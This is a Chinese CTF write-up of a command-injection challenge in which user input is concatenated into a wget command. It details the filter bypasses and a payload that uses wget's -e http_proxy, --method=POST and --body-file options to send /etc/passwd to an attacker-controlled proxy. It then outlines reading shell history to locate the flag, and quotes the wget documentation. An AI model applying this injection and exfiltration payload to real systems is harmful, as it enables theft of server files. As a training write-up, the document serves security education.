题目内容
题目只有三个路由,一个输入点,容易判断考点是命令注入,因此需要先不断测试传入数据并刷新观察回显,来猜测后端与wget命令拼接逻辑和过滤逻辑
具体见2021深育杯线上初赛官方WriteUp
过滤点
fuzz出空格不可用,分号不可用,同理可得反引号,
|,;,&均被过滤成空格,同时能够测试出可利用\n绕过正则合法性检验
命令拼接
因为特殊符号会被替换成空格,所以用分号来替代空格拼接命令
http_proxy参数设置代理机的ip和端口,--method=POST和--body-file参数读取本地文件并以post方式发送到代理服务器上
payloade: -e;http_proxy=http://ip:port/;--method=POST;--body-file=/etc/passwd;\nwww.baidu.com
在linux上实现
读取/etc/passwd文件
命令:wget -e http_proxy=ip:port/ --method=POST --body-file=/etc/passwd \nwww.baidu.com
查看用户的历史输入指令
原题是查看ctf_usr用户的输入指令
利用历史指令得到网站根目录名称
利用得到的目标目录得到目录文件内容
包含该目录下的flag文件得到flag
payload中的命令解释
关于Wgetrc命令
wget -e 执行一个.wgettrc的命令,.wgettrc命令其实是一个参数列表
直接查看wget官方文档的6.3Wgetrc Commands
可以看到题中用到的如
以post的形式传值或文件:
post_data = string
Use POST as the method for all HTTP requests and send string in the request body. The same as ‘--post-data=string’.
post_file = file
Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as ‘--post-file=file’.
设置代理服务器:
http_proxy = string
Use string as HTTP proxy, instead of the one specified in environment.
另外
查看wget官方文档的2.7 HTTP Options下
设置请求方式:
‘--method=HTTP-Method’
设置请求体:
‘--body-data=Data-String’
‘--body-file=Data-File’
Must be set when additional data(附加数据) needs to be sent to the server along with the Method specified using ‘--method’. ‘--body-data’ sends string as data, whereas ‘--body-file’ sends the contents of file. Other than that, they work in exactly the same way.
Currently, ‘--body-file’ is not for transmitting(传输) files as a whole. Wget does not currently support
multipart/form-datafor transmitting data; onlyapplication/x-www-form-urlencoded. In the future, this may be changed so that wget sends the ‘--body-file’ as a complete file(完整文件) instead of sending its contents(内容) to the server. Please be aware that Wget needs to know the contents of BODY Data in advance, and hence the argument to ‘--body-file’ should be a regular file. See ‘--post-file’ for a more detailed explanation. Only one of ‘--body-data’ and ‘--body-file’ should be specified.
注意:用法要注意设置了body-data或body-file必须设置请求方式,如下
┌──(lrt㉿kali)-[~/桌面]
└─$ wget -e http_proxy=192.168.153.139:7070 --body-file=/etc/passwd www.baidu.com
使用 --body-data 或 --body-file 参数时必须通过 --method=HTTPMethod 指定一个传输方式。